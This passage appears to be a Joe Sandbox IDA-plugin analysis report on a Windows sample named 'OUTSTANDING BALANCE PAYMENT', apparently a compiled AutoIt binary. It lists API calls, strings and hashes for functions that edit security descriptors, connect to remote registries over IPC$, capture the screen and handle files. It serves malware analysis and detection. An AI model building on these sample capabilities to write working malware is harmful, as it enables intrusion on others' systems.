                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 618562835-2268648507
                                                          • Opcode ID: 933096f6604990c7e22eafcf0eed678a5ae7f10cba9bfdbbadf38a42b572e7ce
                                                          • Instruction ID: e8000ea02d24014918ac9734ae7feb22067e349af1d6f255a9b831530d571f64
                                                          • Opcode Fuzzy Hash: 933096f6604990c7e22eafcf0eed678a5ae7f10cba9bfdbbadf38a42b572e7ce
                                                          • Instruction Fuzzy Hash: CB415E72800209BACF14FBE4DD86EEEB7B8AF16340F1000A5B50577092EE796F59DB61
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BAD0D8
                                                          • __swprintf.LIBCMT ref: 00BAD0FA
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BAD137
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BAD15C
                                                          • _memset.LIBCMT ref: 00BAD17B
                                                          • _wcsncpy.LIBCMT ref: 00BAD1B7
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BAD1EC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BAD1F7
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00BAD200
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BAD20A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                          • Instruction ID: 28f9f05359cf0d94777aace6c29f7dd72446437ae0b8921aaadc2883702e1c9c
                                                          • Opcode Fuzzy Hash: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                          • Instruction Fuzzy Hash: A5316FB250424AABDB21DFA4DC89FAB77FCEF89740F1041B6F50AD6160EA709645CB24
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BCBEF4,?,?), ref: 00BCE754
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE76B
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE776
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE783
                                                          • GlobalLock.KERNEL32(00000000), ref: 00BCE78C
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE79B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BCE7A4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE7AB
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BCBEF4,?,?,00000000,?), ref: 00BCE7BC
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BED9BC,?), ref: 00BCE7D5
                                                          • GlobalFree.KERNEL32(00000000), ref: 00BCE7E5
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00BCE809
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BCE834
                                                          • DeleteObject.GDI32(00000000), ref: 00BCE85C
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BCE872
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                          • Instruction ID: a7120316146fed6ff0a18c5b6d4a019fb76f8b0ada73619d6541b74d1a6cfd60
                                                          • Opcode Fuzzy Hash: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                          • Instruction Fuzzy Hash: 50413775600244EFDB119F65DC88EAA7BB8EF89711F108098F916EB2A0DB75ED41DB20
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 00BB076F
                                                          • _wcscat.LIBCMT ref: 00BB0787
                                                          • _wcscat.LIBCMT ref: 00BB0799
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB07AE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB07C2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00BB07DA
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BB07F4
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0806
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                          • Instruction ID: baf029750231d3ff274e3477bd9f632828f334114c3f3b1fd8d209c62e34ce39
                                                          • Opcode Fuzzy Hash: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                          • Instruction Fuzzy Hash: 298193715143419FCB24EF24C8859BFB7D8EB94304F1488AEF88AD7250EAB4D944CB52
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BCEF3B
                                                          • GetFocus.USER32 ref: 00BCEF4B
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00BCEF56
                                                          • _memset.LIBCMT ref: 00BCF081
                                                          • GetMenuItemInfoW.USER32 ref: 00BCF0AC
                                                          • GetMenuItemCount.USER32(00000000), ref: 00BCF0CC
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00BCF0DF
                                                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00BCF113
                                                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00BCF15B
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BCF193
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BCF1C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 581b969b9176884889b01a79eae6c5a61294ac9b34d17a11136c9d5a457d8871
                                                          • Instruction ID: 1b2044b9ee83158025d2768bae8621186b1c98e89c371b10595e70a14c0ccafe
                                                          • Opcode Fuzzy Hash: 581b969b9176884889b01a79eae6c5a61294ac9b34d17a11136c9d5a457d8871
                                                          • Instruction Fuzzy Hash: C7816B71604342EFDB20CF15C884FBABBEAEB88714F1445AEF99497291D770D905CB52
                                                          APIs
                                                            • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                            • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                            • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                            • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                            • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                            • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                            • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                            • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A8CB
                                                          • _memset.LIBCMT ref: 00B9A8E0
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A8FF
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B9A910
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A94D
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A969
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B9A986
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A995
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B9A99C
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A9BD
                                                          • CopySid.ADVAPI32(00000000), ref: 00B9A9C4
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A9F5
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9AA1B
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9AA2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                          • Instruction ID: 0006826b26fcbeee3bae80ce43edf7f01545b923476b9423f5ba8328476eabe5
                                                          • Opcode Fuzzy Hash: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                          • Instruction Fuzzy Hash: 2E517F71900209AFDF10DF94DD99EEEBBB9FF04300F048169F911AB291DB759A06CBA1
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00BB9E36
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BB9E42
                                                          • CreateCompatibleDC.GDI32(?), ref: 00BB9E4E
                                                          • SelectObject.GDI32(00000000,?), ref: 00BB9E5B
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BB9EAF
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00BB9EEB
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BB9F0F
                                                          • SelectObject.GDI32(00000006,?), ref: 00BB9F17
                                                          • DeleteObject.GDI32(?), ref: 00BB9F20
                                                          • DeleteDC.GDI32(00000006), ref: 00BB9F27
                                                          • ReleaseDC.USER32(00000000,?), ref: 00BB9F32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 53de20bb614eb5cf680acb9815a8446677f9ce624f11c1bfb1747cc847dee9ba
                                                          • Instruction ID: 57565cfc9fc87b681df4d9144b724f7ce7f42629dfd6cd5e1bf50d0242434d1b
                                                          • Opcode Fuzzy Hash: 53de20bb614eb5cf680acb9815a8446677f9ce624f11c1bfb1747cc847dee9ba
                                                          • Instruction Fuzzy Hash: 45513975900349AFCB14CFA8C885EAEBBF9EF48310F14885DF95AAB210C775A941CB50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2889450990-2391861430
                                                          • Opcode ID: 375174502dbdcb4506468f896672ec80e18e3481ae29509afe736220d365a936
                                                          • Instruction ID: 46fee02570509839355b4bf0b4a93089c542c1f8e07012cd6a4247d6bc3ca095
                                                          • Opcode Fuzzy Hash: 375174502dbdcb4506468f896672ec80e18e3481ae29509afe736220d365a936
                                                          • Instruction Fuzzy Hash: D3517E71900109BACF25EBE4CD46EEEBBB8EF1A304F1001A5F505720A2EB756F59DB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2889450990-3420473620
                                                          • Opcode ID: e5267bf4fd9144a0c59bd154a6009ed502c76c277e9f59fc94463012e2c61ea8
                                                          • Instruction ID: c97e7eb9042389d6ba001536de5fd121b24c39dfd75d328df1f70fa7c5cc7999
                                                          • Opcode Fuzzy Hash: e5267bf4fd9144a0c59bd154a6009ed502c76c277e9f59fc94463012e2c61ea8
                                                          • Instruction Fuzzy Hash: 46517F71900249AACF25EBE0CD42EEEBBB8EF15344F1001A5F505720A2EB756F99DF61
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA55D7
                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BA5664
                                                          • GetMenuItemCount.USER32(00C21708), ref: 00BA56ED
                                                          • DeleteMenu.USER32(00C21708,00000005,00000000,000000F5,?,?), ref: 00BA577D
                                                          • DeleteMenu.USER32(00C21708,00000004,00000000), ref: 00BA5785
                                                          • DeleteMenu.USER32(00C21708,00000006,00000000), ref: 00BA578D
                                                          • DeleteMenu.USER32(00C21708,00000003,00000000), ref: 00BA5795
                                                          • GetMenuItemCount.USER32(00C21708), ref: 00BA579D
                                                          • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA57D3
                                                          • GetCursorPos.USER32(?), ref: 00BA57DD
                                                          • SetForegroundWindow.USER32(00000000), ref: 00BA57E6
                                                          • TrackPopupMenuEx.USER32(00C21708,00000000,?,00000000,00000000,00000000), ref: 00BA57F9
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BA5805
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 3993528054-0
                                                          • Opcode ID: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                          • Instruction ID: 82a282370cc40674dd3c098ec7f813de0a07eb5f6ed4404d5e481aaeef05132c
                                                          • Opcode Fuzzy Hash: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                          • Instruction Fuzzy Hash: 4671E370649605BEEB309F58CC89FAABFE5FF42364F240286F6156A1E0CBB15D10DB90
                                                          APIs
                                                          • _memset.LIBCMT ref: 00B9A1DC
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B9A211
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B9A22D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B9A249
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B9A273
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B9A29B
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2A6
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1687751970-22481851
                                                          • Opcode ID: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                          • Instruction ID: 6b207d78799008a8df06dc57e533ee7eb76f35d4f74e29e271c905d436dd8d95
                                                          • Opcode Fuzzy Hash: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                          • Instruction Fuzzy Hash: 2C410576C10229AADF21EBA4DC95DEDB7B8FF04300F0441A9F805B71A1EB749E15CB90
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                          • Instruction ID: 78ea50a94d972742314d64188b5ca136545c331db783d8f102f06a0fb6786918
                                                          • Opcode Fuzzy Hash: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                          • Instruction Fuzzy Hash: 744152741102498BCF05EF14D891EEA37E9EF16700F5084E8FC661B191EB70DE5ACB10
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BD36F4,00000010,?,Bad directive syntax error,00BFDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BA25D6
                                                          • LoadStringW.USER32(00000000,?,00BD36F4,00000010), ref: 00BA25DD
                                                          • _wprintf.LIBCMT ref: 00BA2610
                                                          • __swprintf.LIBCMT ref: 00BA2632
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BA26A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1080873982-4153970271
                                                          • Opcode ID: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                          • Instruction ID: 0ad33d0d16b354ca447c5f17c542ed6392215fcc296f021bec77822c2b7ec1a7
                                                          • Opcode Fuzzy Hash: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                          • Instruction Fuzzy Hash: 8B217E3180025AAFCF11BF94CC4AEEE7BB9BF19304F0404A9F505670A2DA75A669DB50
                                                          APIs
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BA7B42
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BA7B58
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA7B69
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BA7B7B
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BA7B8C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
